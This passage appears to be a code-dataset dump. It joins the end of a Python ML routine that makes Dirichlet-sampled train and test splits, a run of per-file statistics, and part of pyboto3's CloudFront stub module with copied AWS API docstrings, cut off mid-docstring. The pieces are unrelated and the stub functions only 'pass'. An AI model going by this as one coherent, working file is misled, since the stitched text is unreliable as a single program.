test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args,
distribution=p)
elif args.shift_strategy == "dirichlet_general_eric":
# Dirichlet source, dirichlet target/test (different p)
args.dirichlet_alpha = 3.0
warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
args.dirichlet_alpha = 3.0
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
args.dirichlet_alpha = 0.7
test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args)
elif args.shift_strategy == "dirichlet_general_eric22":
# Dirichlet source, dirichlet target/test (different p)
args.dirichlet_alpha = 1.0
warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
args.dirichlet_alpha = 1.0
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
args.dirichlet_alpha = 0.4
test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args)
elif args.shift_strategy == "dirichlet_general_eric21":
# Dirichlet source, dirichlet target/test (different p)
args.dirichlet_alpha = 2.0
warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
args.dirichlet_alpha = 2.0
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
args.dirichlet_alpha = 0.4
test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args)
elif args.shift_strategy == "dirichlet_general_eric2":
# Dirichlet source, dirichlet target/test (different p)
args.dirichlet_alpha = 3.0
warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
args.dirichlet_alpha = 3.0
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
args.dirichlet_alpha = 0.4
test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args)
elif args.shift_strategy == "dirichlet_general_eric3":
# Dirichlet source, dirichlet target/test (different p)
args.dirichlet_alpha = 3.0
warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
args.dirichlet_alpha = 3.0
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
args.dirichlet_alpha = 1.5
test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args)
elif args.shift_strategy == "dirichlet_general":
# Dirichlet source, dirichlet target/test (different p)
args.dirichlet_alpha = 3.0
warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
args.dirichlet_alpha = 3.0
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
args.dirichlet_alpha = 0.1
test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args)
elif args.shift_strategy == "dirichlet_general3":
# Dirichlet source, dirichlet target/test (different p)
warmstart_idxs, p = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
args.dirichlet_alpha = 3.0
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args,
distribution=p)
elif args.shift_strategy == "dirichlet_general4":
# Dirichlet source, dirichlet target/test (different p)
warmstart_idxs = uniform_dataset(warmstart_idxs_by_label,
warmstart_size, args)
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
args.dirichlet_alpha = 0.4
test_idxs, _ = dirichlet_dataset(test_idxs_by_label,
test_size,
args)
elif args.shift_strategy == "dirichlet_online_source":
# Dirichlet source, dirichlet target/test (different p)
warmstart_idxs = uniform_dataset(warmstart_idxs_by_label,
warmstart_size, args)
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
test_idxs = uniform_dataset(test_idxs_by_label, test_size, args)
else:
raise ValueError()
return warmstart_idxs, online_idxs, test_idxs
| 46.019178
| 79
| 0.548431
| 1,783
| 16,797
| 4.819966
| 0.075715
| 0.092041
| 0.142076
| 0.051199
| 0.858622
| 0.827205
| 0.811962
| 0.792762
| 0.792297
| 0.776123
| 0
| 0.006728
| 0.380544
| 16,797
| 364
| 80
| 46.145604
| 0.819222
| 0.094422
| 0
| 0.742373
| 0
| 0
| 0.030495
| 0.010693
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013559
| false
| 0
| 0.010169
| 0
| 0.037288
| 0.030508
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50a1f101898a950e1e51d117cfc99f3cfd859734
| 330,941
|
py
|
Python
|
pyboto3/cloudfront.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/cloudfront.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/cloudfront.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
def create_cloud_front_origin_access_identity(CloudFrontOriginAccessIdentityConfig=None):
"""
Creates a new origin access identity. If you're using Amazon S3 for your origin, you can use an origin access identity to require users to access your content using a CloudFront URL instead of the Amazon S3 URL. For more information about how to use origin access identities, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide .
See also: AWS API Documentation
:example: response = client.create_cloud_front_origin_access_identity(
CloudFrontOriginAccessIdentityConfig={
'CallerReference': 'string',
'Comment': 'string'
}
)
:type CloudFrontOriginAccessIdentityConfig: dict
:param CloudFrontOriginAccessIdentityConfig: [REQUIRED]
The current configuration information for the identity.
CallerReference (string) -- [REQUIRED]A unique number that ensures the request can't be replayed.
If the CallerReference is new (no matter the content of the CloudFrontOriginAccessIdentityConfig object), a new origin access identity is created.
If the CallerReference is a value already sent in a previous identity request, and the content of the CloudFrontOriginAccessIdentityConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request.
If the CallerReference is a value you already sent in a previous request to create an identity, but the content of the CloudFrontOriginAccessIdentityConfig is different from the original request, CloudFront returns a CloudFrontOriginAccessIdentityAlreadyExists error.
Comment (string) -- [REQUIRED]Any comments you want to include about the origin access identity.
:rtype: dict
:return: {
'CloudFrontOriginAccessIdentity': {
'Id': 'string',
'S3CanonicalUserId': 'string',
'CloudFrontOriginAccessIdentityConfig': {
'CallerReference': 'string',
'Comment': 'string'
}
},
'Location': 'string',
'ETag': 'string'
}
"""
pass
def create_distribution(DistributionConfig=None):
"""
Creates a new web distribution. Send a POST request to the /*CloudFront API version* /distribution /distribution ID resource.
See also: AWS API Documentation
:example: response = client.create_distribution(
DistributionConfig={
'CallerReference': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'DefaultRootObject': 'string',
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'IncludeCookies': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
}
)
:type DistributionConfig: dict
:param DistributionConfig: [REQUIRED]
The distribution's configuration information.
CallerReference (string) -- [REQUIRED]A unique value (for example, a date-time stamp) that ensures that the request can't be replayed.
If the value of CallerReference is new (regardless of the content of the DistributionConfig object), CloudFront creates a new distribution.
If CallerReference is a value you already sent in a previous request to create a distribution, and if the content of the DistributionConfig is identical to the original request (ignoring white space), CloudFront returns the same the response that it returned to the original request.
If CallerReference is a value you already sent in a previous request to create a distribution but the content of the DistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error.
Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this distribution.
Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution.
Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution.
(string) --
DefaultRootObject (string) --The object that you want CloudFront to request from your origin (for example, index.html ) when a viewer requests the root URL for your distribution (http://www.example.com ) instead of an object in your distribution (http://www.example.com/product-description.html ). Specifying a default root object avoids exposing the contents of your distribution.
Specify only the object name, for example, index.html . Do not add a / before the object name.
If you don't want to specify a default root object when you create a distribution, include an empty DefaultRootObject element.
To delete the default root object from an existing distribution, update the distribution configuration and include an empty DefaultRootObject element.
To replace the default root object, update the distribution configuration and specify the new object.
For more information about the default root object, see Creating a Default Root Object in the Amazon CloudFront Developer Guide .
Origins (dict) -- [REQUIRED]A complex type that contains information about origins for this distribution.
Quantity (integer) -- [REQUIRED]The number of origins for this distribution.
Items (list) --A complex type that contains origins for this distribution.
(dict) --A complex type that describes the Amazon S3 bucket or the HTTP server (for example, a web server) from which CloudFront gets your files. You must create at least one origin.
For the current limit on the number of origins that you can create for a distribution, see Amazon CloudFront Limits in the AWS General Reference .
Id (string) -- [REQUIRED]A unique identifier for the origin. The value of Id must be unique within the distribution.
When you specify the value of TargetOriginId for the default cache behavior or for another cache behavior, you indicate the origin to which you want the cache behavior to route requests by specifying the value of the Id element for that origin. When a request matches the path pattern for that cache behavior, CloudFront routes the request to the specified origin. For more information, see Cache Behavior Settings in the Amazon CloudFront Developer Guide .
DomainName (string) -- [REQUIRED]
Amazon S3 origins : The DNS name of the Amazon S3 bucket from which you want CloudFront to get objects for this origin, for example, myawsbucket.s3.amazonaws.com .
Constraints for Amazon S3 origins:
If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName .
The bucket name must be between 3 and 63 characters long (inclusive).
The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes.
The bucket name must not contain adjacent periods.
Custom Origins : The DNS domain name for the HTTP server from which you want CloudFront to get objects for this origin, for example, www.example.com .
Constraints for custom origins:
DomainName must be a valid DNS name that contains only a-z, A-Z, 0-9, dot (.), hyphen (-), or underscore (_) characters.
The name cannot exceed 128 characters.
OriginPath (string) --An optional element that causes CloudFront to request your content from a directory in your Amazon S3 bucket or your custom origin. When you include the OriginPath element, specify the directory name, beginning with a / . CloudFront appends the directory name to the value of DomainName , for example, example.com/production . Do not include a / at the end of the directory name.
For example, suppose you've specified the following values for your distribution:
DomainName : An Amazon S3 bucket named myawsbucket .
OriginPath : /production
CNAME : example.com
When a user enters example.com/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/index.html .
When a user enters example.com/acme/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/acme/index.html .
CustomHeaders (dict) --A complex type that contains names and values for the custom headers that you want.
Quantity (integer) -- [REQUIRED]The number of custom headers, if any, for this distribution.
Items (list) --
Optional : A list that contains one OriginCustomHeader element for each custom header that you want CloudFront to forward to the origin. If Quantity is 0 , omit Items .
(dict) --A complex type that contains HeaderName and HeaderValue elements, if any, for this distribution.
HeaderName (string) -- [REQUIRED]The name of a header that you want CloudFront to forward to your origin. For more information, see Forwarding Custom Headers to Your Origin (Web Distributions Only) in the Amazon Amazon CloudFront Developer Guide .
HeaderValue (string) -- [REQUIRED]The value for the header that you specified in the HeaderName field.
S3OriginConfig (dict) --A complex type that contains information about the Amazon S3 origin. If the origin is a custom origin, use the CustomOriginConfig element instead.
OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the origin. Use an origin access identity to configure the origin so that viewers can only access objects in an Amazon S3 bucket through CloudFront. The format of the value is:
origin-access-identity/CloudFront/ID-of-origin-access-identity
where `` ID-of-origin-access-identity `` is the value that CloudFront returned in the ID element when you created the origin access identity.
If you want viewers to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element.
To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element.
To replace the origin access identity, update the distribution configuration and specify the new origin access identity.
For more information about the origin access identity, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide .
CustomOriginConfig (dict) --A complex type that contains information about a custom origin. If the origin is an Amazon S3 bucket, use the S3OriginConfig element instead.
HTTPPort (integer) -- [REQUIRED]The HTTP port the custom origin listens on.
HTTPSPort (integer) -- [REQUIRED]The HTTPS port the custom origin listens on.
OriginProtocolPolicy (string) -- [REQUIRED]The origin protocol policy to apply to your origin.
OriginSslProtocols (dict) --The SSL/TLS protocols that you want CloudFront to use when communicating with your origin over HTTPS.
Quantity (integer) -- [REQUIRED]The number of SSL/TLS protocols that you want to allow CloudFront to use when establishing an HTTPS connection with this origin.
Items (list) -- [REQUIRED]A list that contains allowed SSL/TLS protocols for this distribution.
(string) --
OriginReadTimeout (integer) --You can create a custom origin read timeout. All timeout units are in seconds. The default origin read timeout is 30 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 4 seconds; the maximum is 60 seconds.
If you need to increase the maximum time limit, contact the AWS Support Center .
OriginKeepaliveTimeout (integer) --You can create a custom keep-alive timeout. All timeout units are in seconds. The default keep-alive timeout is 5 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 1 second; the maximum is 60 seconds.
If you need to increase the maximum time limit, contact the AWS Support Center .
DefaultCacheBehavior (dict) -- [REQUIRED]A complex type that describes the default cache behavior if you do not specify a CacheBehavior element or if files don't match any of the values of PathPattern in CacheBehavior elements. You must create exactly one default cache behavior.
TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior.
ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies.
QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any:
If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin.
If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify.
If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters.
For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide .
Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide .
Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type.
Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element.
WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies.
If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically.
For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference .
Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior.
Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior.
(string) --
Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following:
Forward all headers to your origin : Specify 1 for Quantity and * for Name .
Warning
If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin.
Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify.
Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers.
Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items .
(string) --
QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior.
Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items .
(string) --
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content.
If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide .
If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items .
To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options:
allow-all : Viewers can use HTTP or HTTPS.
redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL.
https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden).
For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide .
Note
The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide .
You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ).
AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices:
CloudFront forwards only GET and HEAD requests.
CloudFront forwards only GET , HEAD , and OPTIONS requests.
CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests.
If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin.
Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin.
(string) --
CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices:
CloudFront caches responses to GET and HEAD requests.
CloudFront caches responses to GET , HEAD , and OPTIONS requests.
If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly.
Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to.
(string) --
SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern .
DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MaxTTL (integer) --
Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true ; if not, specify false . For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide .
LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior.
Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior.
Items (list) --
Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items .
(dict) --A complex type that contains a Lambda function association.
LambdaFunctionARN (string) --The ARN of the Lambda function.
EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are:
viewer-request
origin-request
viewer-response
origin-response
CacheBehaviors (dict) --A complex type that contains zero or more CacheBehavior elements.
Quantity (integer) -- [REQUIRED]The number of cache behaviors for this distribution.
Items (list) --Optional: A complex type that contains cache behaviors for this distribution. If Quantity is 0 , you can omit Items .
(dict) --A complex type that describes how CloudFront processes requests.
You must create at least as many cache behaviors (including the default cache behavior) as you have origins if you want CloudFront to distribute objects from all of the origins. Each cache behavior specifies the one origin from which you want CloudFront to get objects. If you have two origins and only the default cache behavior, the default cache behavior will cause CloudFront to get objects from one of the origins, but the other origin is never used.
For the current limit on the number of cache behaviors that you can add to a distribution, see Amazon CloudFront Limits in the AWS General Reference .
If you don't want to specify any cache behaviors, include only an empty CacheBehaviors element. Don't include an empty CacheBehavior element, or CloudFront returns a MalformedXML error.
To delete all cache behaviors in an existing distribution, update the distribution configuration and include only an empty CacheBehaviors element.
To add, change, or remove one or more cache behaviors, update the distribution configuration and specify all of the cache behaviors that you want to include in the updated distribution.
For more information about cache behaviors, see Cache Behaviors in the Amazon CloudFront Developer Guide .
PathPattern (string) -- [REQUIRED]The pattern (for example, images/*.jpg ) that specifies which requests to apply the behavior to. When CloudFront receives a viewer request, the requested path is compared with path patterns in the order in which cache behaviors are listed in the distribution.
Note
You can optionally include a slash (/ ) at the beginning of the path pattern. For example, /images/*.jpg . CloudFront behavior is the same with or without the leading / .
The path pattern for the default cache behavior is * and cannot be changed. If the request for an object does not match the path pattern for any cache behaviors, CloudFront applies the behavior in the default cache behavior.
For more information, see Path Pattern in the Amazon CloudFront Developer Guide .
TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior.
ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies.
QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any:
If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin.
If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify.
If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters.
For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide .
Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide .
Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type.
Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element.
WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies.
